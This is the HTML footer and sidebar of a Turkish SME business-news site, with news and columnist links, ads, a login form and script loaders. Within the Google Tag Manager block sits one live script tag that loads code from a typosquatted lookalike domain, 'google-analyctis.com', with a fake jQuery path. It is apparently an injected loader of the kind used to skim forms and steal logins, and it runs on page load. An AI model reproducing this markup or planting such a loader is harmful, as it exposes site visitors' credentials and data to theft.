                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/xerox_brenva_hd_production_pressten_3_cazip_ozellik_h8052_5c3d1.jpg" alt="Xerox Brenva HD Production Press’ten 3 cazip özellik" />
                    <p>Xerox Brenva HD Production Press’ten 3 cazip özellik</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turk-patent-kurumunun-yaptigi-indirimle-basvurular-artacak-h8051.html" title="&#039;Türk Patent Kurumunun yaptığı indirimle başvurular artacak”">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_patent_kurumunun_yaptigi_indirimle_basvurular_artacak_h8051_2eb62.jpg" alt="“Türk Patent Kurumunun yaptığı indirimle başvurular artacak”" />
                    <p>“Türk Patent Kurumunun yaptığı indirimle başvurular artacak”</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/manisali-is-dunyasina-kuzey-ren-vestfaya-eyaletinin-yatirim-firsatlari-anlatildi-h8054.html" title="Manisalı iş dünyasına Kuzey Ren-Vestfaya Eyaleti&#039;nin yatırım fırsatları anlatıldı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/manisali_is_dunyasina_kuzey_ren_vestfaya_eyaletinin_yatirim_firsatlari_anlatildi_h8054_43807.jpg" alt="Manisalı iş dünyasına Kuzey Ren-Vestfaya Eyaleti’nin yatırım fırsatları anlatıldı" />
                    <p>Manisalı iş dünyasına Kuzey Ren-Vestfaya Eyaleti’nin yatırım fırsatları anlatıldı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/fkbde-ahmet-duman-donemi-basladi-h8063.html" title="FKB&#039;de Ahmet Duman dönemi başladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/fkbde_ahmet_duman_donemi_basladi_h8063_43a45.jpg" alt="FKB’de Ahmet Duman dönemi başladı" />
                    <p>FKB’de Ahmet Duman dönemi başladı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/osd-acikladi-ilk-7-ayda-uretim-yuzde-3-h8061.html" title="OSD açıkladı: İlk 7 ayda üretim yüzde 3">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/osd_acikladi_ilk_7_ayda_uretim_yuzde_3_h8061_abe3d.jpg" alt="OSD açıkladı: İlk 7 ayda üretim yüzde 3" />
                    <p>OSD açıkladı: İlk 7 ayda üretim yüzde 3</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/sanayi-ve-teknoloji-bakani-varanktan-makine-ihracatcilarina-ziyaret-h8056.html" title="Sanayi ve Teknoloji Bakanı Varank&#039;tan makine ihracatçılarına ziyaret">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sanayi_ve_teknoloji_bakani_varanktan_makine_ihracatcilarina_ziyaret_h8056_5957b.jpg" alt="Sanayi ve Teknoloji Bakanı Varank’tan makine ihracatçılarına ziyaret" />
                    <p>Sanayi ve Teknoloji Bakanı Varank’tan makine ihracatçılarına ziyaret</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/osd-devletimiz-ilk-adimi-atti-h8059.html" title="OSD: &#039;Devletimiz ilk adımı attı”">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/osd_devletimiz_ilk_adimi_atti_h8059_e853c.jpg" alt="OSD: “Devletimiz ilk adımı attı”" />
                    <p>OSD: “Devletimiz ilk adımı attı”</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/turk-telekomun-yonetim-ve-denetim-kurulunda-degisiklik-h8055.html" title="Türk Telekom&#039;un yönetim ve denetim kurulunda değişiklik">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turk_telekomun_yonetim_ve_denetim_kurulunda_degisiklik_h8055_b8f12.jpg" alt="Türk Telekom’un yönetim ve denetim kurulunda değişiklik" />
                    <p>Türk Telekom’un yönetim ve denetim kurulunda değişiklik</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/tusiad-sanayide-dijital-donusumu-gundeme-aliyor-h8057.html" title="TÜSİAD, sanayide dijital dönüşümü gündeme alıyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tusiad_sanayide_dijital_donusumu_gundeme_aliyor_h8057_7ba24.jpg" alt="TÜSİAD, sanayide dijital dönüşümü gündeme alıyor" />
                    <p>TÜSİAD, sanayide dijital dönüşümü gündeme alıyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/hareketini-dogadan-alan-servo-surucu-sistemi-sinamics-s210-h8049.html" title="Hareketini doğadan alan servo sürücü sistemi: Sinamics S210">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/hareketini_dogadan_alan_servo_surucu_sistemi_sinamics_s210_h8049_8d846.jpg" alt="Hareketini doğadan alan servo sürücü sistemi: Sinamics S210" />
                    <p>Hareketini doğadan alan servo sürücü sistemi: Sinamics S210</p>
                  </a>
                  
                                  </div>
                <div class="item">                                    <a href="http://www.kobi-efor.com.tr/reel-sektor/ifc-turkiyede-11-milyar-dolarlik-yatirim-yapti-h8058.html" title="IFC , Türkiye&#039;de 1.1 milyar dolarlık yatırım yaptı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/" alt="IFC , Türkiye’de 1.1 milyar dolarlık yatırım yaptı" />
                    <p>IFC , Türkiye’de 1.1 milyar dolarlık yatırım yaptı</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ifs-turkiye-e-irsaliye-donusumune-hazir-h8050.html" title="IFS Türkiye, E- İrsaliye dönüşümüne hazır">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ifs_turkiye_e_irsaliye_donusumune_hazir_h8050_fb02a.jpg" alt="IFS Türkiye, E- İrsaliye dönüşümüne hazır" />
                    <p>IFS Türkiye, E- İrsaliye dönüşümüne hazır</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/enka-systemsta-hedef-alaninda-dunyanin-en-buyuk-yazilim-firmasi-olmak-h8053.html" title="ENKA Systems&#039;ta hedef, alanında dünyanın en büyük yazılım firması olmak">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/enka_systemsta_hedef_alaninda_dunyanin_en_buyuk_yazilim_firmasi_olmak_h8053_3ea0e.jpg" alt="ENKA Systems’ta hedef, alanında dünyanın en büyük yazılım firması olmak" />
                    <p>ENKA Systems’ta hedef, alanında dünyanın en büyük yazılım firması olmak</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/50-yilini-geride-birakan-olmuksan-ip-yatirimda-hiz-kesmiyor-h8060.html" title="50. yılını geride bırakan Olmuksan IP yatırımda hız kesmiyor">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/50_yilini_geride_birakan_olmuksan_ip_yatirimda_hiz_kesmiyor_h8060_95137.jpg" alt="50. yılını geride bırakan Olmuksan IP yatırımda hız kesmiyor" />
                    <p>50. yılını geride bırakan Olmuksan IP yatırımda hız kesmiyor</p>
                  </a>
                  
                                                      <a href="http://www.kobi-efor.com.tr/reel-sektor/ey-yilin-girisimcisi-programi-icin-basvurular-basladi-h8062.html" title="‘EY Yılın Girişimcisi&#039; programı için başvurular başladı">
                    <img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ey_yilin_girisimcisi_programi_icin_basvurular_basladi_h8062_96514.jpg" alt="‘EY Yılın Girişimcisi’ programı için başvurular başladı" />
                    <p>‘EY Yılın Girişimcisi’ programı için başvurular başladı</p>
                  </a>
                  
                                  </div>
                <div class="item">                                  </div>
              </div>
            </div>                                                <!-- YAZARLAR -->
            <div id="syazar">
              <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar.html" title="Yazarlar">Yazarlar</a></h5>
                                <a class="control left" href="#" id="syprev"></a>
                <a class="control right" href="#" id="synext"></a>
                              </div>
              <div class="content">
                <div class="item">

                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/yepin-sorumlulugu-makale,492.html" title="Yalçın Sönmez  (EDİTÖR)" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/yalcin_sonmez_editor.jpg" alt="Yalçın Sönmez  (EDİTÖR)" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/yepin-sorumlulugu-makale,492.html" title="Yalçın Sönmez  (EDİTÖR)" >Yalçın Sönmez  (EDİTÖR)</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/yepin-sorumlulugu-makale,492.html" title="YEP&#039;İN SORUMLULUĞU" >YEP’İN SORUMLULUĞU</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/ayakkabi-sektorunun-sorunlari-uretim-ve-ihracatla-asilir-makale,491.html" title="Hilmi Develi" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/hilmi-develi-temmuz2018.jpg" alt="Hilmi Develi" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/ayakkabi-sektorunun-sorunlari-uretim-ve-ihracatla-asilir-makale,491.html" title="Hilmi Develi" >Hilmi Develi</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/ayakkabi-sektorunun-sorunlari-uretim-ve-ihracatla-asilir-makale,491.html" title="Ayakkabı Sektörünün Sorunları, Üretim ve İhracatla Aşılır" >Ayakkabı Sektörünün Sorunları, Üretim ve İhracatla Aşılır</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/kobilere-kalite-tesvigi-ve-kalder-40-makale,490.html" title="Buket Eminoğlu Pilavcı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/buket_eminoglu_pilavci_1.jpg" alt="Buket Eminoğlu Pilavcı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/kobilere-kalite-tesvigi-ve-kalder-40-makale,490.html" title="Buket Eminoğlu Pilavcı" >Buket Eminoğlu Pilavcı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/kobilere-kalite-tesvigi-ve-kalder-40-makale,490.html" title="KOBİ&#039;lere Kalite Teşviği ve KalDer 4.0" >KOBİ’lere Kalite Teşviği ve KalDer 4.0</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/patron-ve-yonetici-farkli-dusunur-makale,489.html" title="Haluk Ünaldı" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/haluk-unaldi-yazar.jpg" alt="Haluk Ünaldı" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/patron-ve-yonetici-farkli-dusunur-makale,489.html" title="Haluk Ünaldı" >Haluk Ünaldı</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/patron-ve-yonetici-farkli-dusunur-makale,489.html" title="Patron ve Yönetici Farklı Düşünür!" >Patron ve Yönetici Farklı Düşünür!</a></p>
                    </div>
                  </div>
                                  </div>
                <div class="item">                                  <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/umutsuzluk-bir-virustur-makale,488.html" title="Turgay Biçer" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/turgay_bicer_1.jpg" alt="Turgay Biçer" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/umutsuzluk-bir-virustur-makale,488.html" title="Turgay Biçer" >Turgay Biçer</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/umutsuzluk-bir-virustur-makale,488.html" title="Umutsuzluk Bir Virüstür…" >Umutsuzluk Bir Virüstür…</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/parkinson-hastaligi-hakkinda-kisa-bilgiler-makale,487.html" title="Prof. Dr. Sibel Özekmekçi" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/Prof-Dr-sibel-ozekmekci.jpg" alt="Prof. Dr. Sibel Özekmekçi" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/parkinson-hastaligi-hakkinda-kisa-bilgiler-makale,487.html" title="Prof. Dr. Sibel Özekmekçi" >Prof. Dr. Sibel Özekmekçi</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/parkinson-hastaligi-hakkinda-kisa-bilgiler-makale,487.html" title="Parkinson Hastalığı Hakkında Kısa Bilgiler" >Parkinson Hastalığı Hakkında Kısa Bilgiler</a></p>
                    </div>
                  </div>
                                                    <div class="row-fluid">
                    <div class="span3">
                      <a href="http://www.kobi-efor.com.tr/kurumlarda-calisanlarin-katilimini-artirabilmenin-5-yolu-makale,486.html" title="Kadri Demir" ><img src="http://www.kobi-efor.com.tr/images/yazarlar/thumbs/kadri-demir.jpg" alt="Kadri Demir" class="img-rounded" /></a>
                    </div>
                    <div class="span9">
                      <h5><a href="http://www.kobi-efor.com.tr/kurumlarda-calisanlarin-katilimini-artirabilmenin-5-yolu-makale,486.html" title="Kadri Demir" >Kadri Demir</a></h5>
                      <p><a href="http://www.kobi-efor.com.tr/kurumlarda-calisanlarin-katilimini-artirabilmenin-5-yolu-makale,486.html" title="Kurumlarda Çalışanların Katılımını Artırabilmenin 5 Yolu" >Kurumlarda Çalışanların Katılımını Artırabilmenin 5 Yolu</a></p>
                    </div>
                  </div>
                                                </div>
            </div>
            <div class="header">
                <h5><a href="http://www.kobi-efor.com.tr/yazarlar-alinti.html" title="Konuk Yazarlar Arşivi">Konuk Yazarlar Arşivi</a></h5>
           <!--     <a class="control left" href="#" id="ayprev"></a>
                <a class="control right" href="#" id="aynext"></a> -->
              </div>
            </div>
                                    <!-- REKLAM-54  -->
            <div class="reklam"><a href="http://www.kobi-efor.com.tr/banner.php?id=224" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/27_kalite_kongresi.jpg&w=300&h=250&q=90" width="300" height="250" style="width:300px;height: 250px;border:0" alt="banner224" /></a></div>
                                    

                      <!-- ENCOKLAR  -->
            <div class="encoklar">
              <div class="accordion">
                              <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
                    <h5><i class="halflings-icon white fire"></i> En Çok Okunan Haberler</h5></a>
                  </div>
                  <div id="collapseOne" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                <li><a href="http://www.kobi-efor.com.tr/kapak/gunes-bulut-arkasindan-gozuktu-yeni-ekonomi-programi-h8043.html" title="Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI" ><!--b>1.</b--> Güneş bulut arkasından gözüktü; YENİ EKONOMİ PROGRAMI</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/osbuk-ic-anadolu-bolge-toplantisi-kayseride-gerceklestirildi-h7991.html" title="OSBÜK İç Anadolu Bölge Toplantısı, Kayseri&#039;de gerçekleştirildi" ><!--b>2.</b--> OSBÜK İç Anadolu Bölge Toplantısı, Kayseri’de gerçekleştirildi</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/gelecegin-liderleri-gebzede-yetisiyor-h8045.html" title="Geleceğin Liderleri Gebze&#039;de Yetişiyor!" ><!--b>3.</b--> Geleceğin Liderleri Gebze’de Yetişiyor!</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/ekonomist/turkiyede-reel-sektor-sikintisi-yasaniyor-nedeni-borcla-buyuduk-h7989.html" title="Türkiye&#039;de reel sektör sıkıntısı yaşanıyor. Nedeni: &#039;Borçla büyüdük”" ><!--b>4.</b--> Türkiye’de reel sektör sıkıntısı yaşanıyor. Nedeni: “Borçla büyüdük”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/universite/toplumu-oncelikliyor-mezununun-niteligini-yukseltiyor-h7990.html" title="Toplumu öncelikliyor, mezununun niteliğini yükseltiyor" ><!--b>5.</b--> Toplumu öncelikliyor, mezununun niteliğini yükseltiyor</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/ayin-konugu/adana-valisi-mahmut-demirtas-adana-markalasma-yoluna-girdi-h8048.html" title="Adana Valisi Mahmut Demirtaş: &#039;Adana markalaşma yoluna girdi”" ><!--b>6.</b--> Adana Valisi Mahmut Demirtaş: “Adana markalaşma yoluna girdi”</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/haber/yanindayiz-hareketi-basladi-h8047.html" title="‘YANINDAYIZ&#039; hareketi başladı" ><!--b>7.</b--> ‘YANINDAYIZ’ hareketi başladı</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/kapak/turkiye-sikintili-bir-gecitte-cikis-yolu-yerli-ve-milli-uretime-destek-ve-tesvikler-h8008.html" title="Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ&#039; ÜRETİME DESTEK VE TEŞVİKLER" ><!--b>8.</b--> Türkiye sıkıntılı bir geçitte, çıkış yolu; ‘YERLİ ve MİLLİ’ ÜRETİME DESTEK VE TEŞVİKLER</a></li>
                                                <li><a href="http://www.kobi-efor.com.tr/dosya/yerli-ve-milli-uretimin-merkez-usleri-teknoparklar-h8064.html" title="‘Yerli ve milli&#039; üretimin merkez üsleri: Teknoparklar" ><!--b>9.</b--> ‘Yerli ve milli’ üretimin merkez üsleri: Teknoparklar</a></li>
                                                <li class="last"><a href="http://www.kobi-efor.com.tr/firma-tanitim/atlas-copco-kompresor-teknigi-h7986.html" title="Atlas Copco Kompresör Tekniği" ><!--b>10.</b--> Atlas Copco Kompresör Tekniği</a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                                            <div class="accordion-group">
                  <div class="accordion-heading">
                    <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
                      <h5><i class="halflings-icon white comments"></i> En Çok Yorumlanan Haberler</h5></a>
                  </div>
                  <div id="collapseTwo" class="accordion-body collapse in">
                    <div class="accordion-inner">
                      <ul>
                                                  <li class="last"><a href="http://www.kobi-efor.com.tr/-h.html" title="" ><!--b>1.</b--> </a></li>
                                              </ul>
                    </div>
                  </div>
                </div>
                            </div>
            </div>
            
                                                            <!--
                                                                                                <!-- REKLAM-58  -->
            <div class="reklam"><div class="fb-page" data-href="https://www.facebook.com/kobiefor" data-width="300" data-height="600" data-small-header="true" data-adapt-container-width="true" data-hide-cover="true" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/kobiefor"><a href="https://www.facebook.com/kobiefor">KobiEfor Dergisi</a></blockquote></div></div></div>
                        
	    

                                                                                                    </div>
              </div>
            </div>
                      </div>
        </div>
      </div>
      <div class="footer">
        <div class="container center">
          <!-- FOOTER -->
<div id="linkler" class="row-fluid">
  </div>
		<!--div class="btn-group dropup">
  			<button class="btn">Hızlı Menü</button>
  			<button class="btn dropdown-toggle" data-toggle="dropdown">
    			<span class="caret"></span>
  			</button>
			<ul class="dropdown-menu">
        		<li><a href="#"><i class="icon-file"></i> Künye</a></li>
				<li class="divider"></li>
        		<li><a href="#"><i class="icon-plus"></i> Sitene Ekle</a></li>
        		<li><a href="#"><i class="icon-thumbs-up"></i> Reklam Ver</a></li>
        		<li><a href="#"><i class="icon-envelope"></i> İletişim Formu</a></li>
    		</ul>
		</div-->
    <hr>
  <div id="footer-alt" class="row-fluid">
  <div class="span2">
    <a href="http://www.kobi-efor.com.tr/" class="logo"><img src="http://www.kobi-efor.com.tr/images/banner/kobiefor_altbolge.png" alt="İLANCILIK Reklam Ajansı, 109 yaşında" /></a>
  </div>
  <div class="span10">
    <ul class="unstyled">
      <li><a href="http://www.kobi-efor.com.tr/kunye.html"><i class="halflings-icon link"></i> Künye</a></li>
      <li><a href="http://www.kobi-efor.com.tr/anketler.html"><i class="halflings-icon check"></i> Anketler</a></li>
      <li><a href="http://www.kobi-efor.com.tr/roportajlar.html"><i class="halflings-icon tags"></i> Röportajlar</a></li>
      <li><a href="http://www.kobi-efor.com.tr/astroloji"><i class="halflings-icon globe"></i> Astroloji</a></li>
      <li><a href="http://www.kobi-efor.com.tr/sitene-ekle.html"><i class="halflings-icon plus-sign"></i> Sitene Ekle</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon usd"></i> Reklam Ver</a></li>
      <li><a href="http://www.kobi-efor.com.tr/iletisim.html"><i class="halflings-icon envelope"></i> İletişim Formu</a></li>
    </ul>
        <p>&copy; 2018 - Sitemizde yayınlanan haberlerin telif hakları haber kaynaklarına aittir. İzin alınmadan kopyalanamaz.</p>
        <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p>
  </div>
  </div>
<!-- FOOTER ***************************************************** -->        </div>
        <div id="top" class="btn btn-inverse">Yukarı Çık</div>
      </div>
      <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.kobi-efor.com.tr/index.php?m=login" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.kobi-efor.com.tr/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.kobi-efor.com.tr/sifremi-unuttum.html" class="pull-left btn">Şifremi Unuttum</a>
    <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>



   
  <div class="reklam dikey sol" > 
                <p style="width:160px;"><a href="http://www.kobi-efor.com.tr/banner.php?id=227" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/ihi-dk-banner-160-600.jpg&w=160&h=600&q=90" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner227" /></a></p>      <p><a href="http://www.kobi-efor.com.tr/banner.php?id=223" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/thumb.php?src=http://www.kobi-efor.com.tr/images/banner/turkcell-dergilik-160x600-ekim2018.jpg&w=160&h=600&q=90" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner223" /></a></p>                            </div>
    <div class="reklam dikey sag ortala">
                  <p><a href="http://www.kobi-efor.com.tr/banner.php?id=216" target="_blank" rel="nofollow"><img src="http://www.kobi-efor.com.tr/images/banner/ergun-mak-160-600.gif" width="160" height="600" style="width:160px;height: 600px;border:0" alt="banner216" /></a></p>                                                                                                                                                                    </div>



	
                    


<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/login.js"></script>
<script src="http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/yepnope.1.5.4-min.js"></script>
<script>
	yepnope({
		load: [
			'https://code.jquery.com/jquery-1.9.1.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cookie.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.mousewheel.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.scrollbar.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/jquery.cycle.lite.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/base.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/hs.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/waypoints.min.js',
			'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/sticky.min.js',
						,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/comments.js'									,'http://www.kobi-efor.com.tr/_themes/hs-vertigo/js/system.js',

		],



		complete : function(){  
		      
			$(function(){  
				$.getScript('http://platform.twitter.com/widgets.js');
				$.getScript('http://www.google-analytics.com/ga.js');
																

				if (typeof (FB) != 'undefined') {
					FB.init({ status: true, cookie: true, xfbml: true });
				} else {
					$.getScript("http://connect.facebook.net/tr_TR/all.js#xfbml=1", function () {
						FB.init({ status: true, cookie: true, xfbml: true });
					});
				}

				if (typeof (gapi) != 'undefined') {
					gbuttons.each(function () {
						gapi.plusone.render($(this).get(0));
					});
				} else {
					$.getScript('https://apis.google.com/js/plusone.js');
				}


			});
			


   			hs.graphicsDir = 'http://www.kobi-efor.com.tr/_themes/hs-vertigo/images/hs/';
   			
			$.getJSON(site_url + 'cache/static/twitter_followers.json',function(data) { 
				$('a#followers').html(data);
			});

			var graph_url = 'https://graph.facebook.com/'+facebook_user;
			$.getJSON(graph_url, function(data) {
			  $('a#likes').html(data.likes);
			});


			

			$('.sticky-menu').waypoint('sticky', {
				wrapper: '<div class="sticky-wrapper" />',
				stuckClass: 'stuck'
			});

							$('body').append($("<div class='popup hiding' id='article-finished'></div>"));
				$("#article-finished").html("").append($("#ilgilihaberler2"));


				$('.footer').waypoint(function(direction) {
				  $('#article-finished').toggleClass('hiding', direction === "up");
				}, {
				  offset: function() {
				    return $.waypoints('viewportHeight') - $(this).height() + 500;
				  }
				});
			

			


			



			




			


			
			
						

   
		 }  




	});

</script>


    <!-- Google Tag Manager -->
<noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-W3SBKW"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-W3SBKW');</script>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<!-- End Google Tag Manager -->    


           


    <div id="fb-root"></div>
        <script type="text/javascript">
      var fbTitle  = encodeURIComponent("İLANCILIK Reklam Ajansı, 109 yaşında");
      var fbUrl    = encodeURIComponent(location.href);
      var fbThumb  = "http://www.kobi-efor.com.tr/images/haberler/thumbs/ilancilik_reklam_ajansi_109_yasinda_h7984_9a242.jpg";
      var fbDesc   = encodeURIComponent("&#039;İlancılık, Türkiye&#039;nin ilk reklam okulu” diyen İlancılık Reklam Ajansı Başkanı Yakup Barouh ile ajansın sektörde 100 yılı aşkın süredir yaşamını sürdürebilme başarısını konuştuk. Yenilikçi ve hızlı yapısıyla dijital çağı da yakalayan ajansın ikinci şirketi digitalpanzehir&#039;in Ajans Başkanı İlker Barouh ise &#039;Dijital olmazsa olmaz” vurgusu yapıyor.");
    </script> 
    
<div id="ilgilihaberler2">
          <p><a href="http://www.kobi-efor.com.tr/ajans/dijitalde-seviye-yukselten-ajans-levelup-h7888.html" title="Dijitalde seviye yükselten ajans; LEVELUP"><b>Dijitalde seviye yükselten ajans; LEVELUP</b>
      <br>Müşterilerine “Let’s LevelUp (Hadi seviyemizi yükseltelim” diyen yeni nesil hizmet ajansı LEVELUP, önümüzdeki...</a></p>
      <p><a href="http://www.kobi-efor.com.tr/ajans/dijitalde-seviye-yukselten-ajans-levelup-h7888.html" title="Dijitalde seviye yükselten ajans; LEVELUP" class="btn btn-danger btn-small">Haberi Oku</a></p>
    </div>


  </body>
</html>
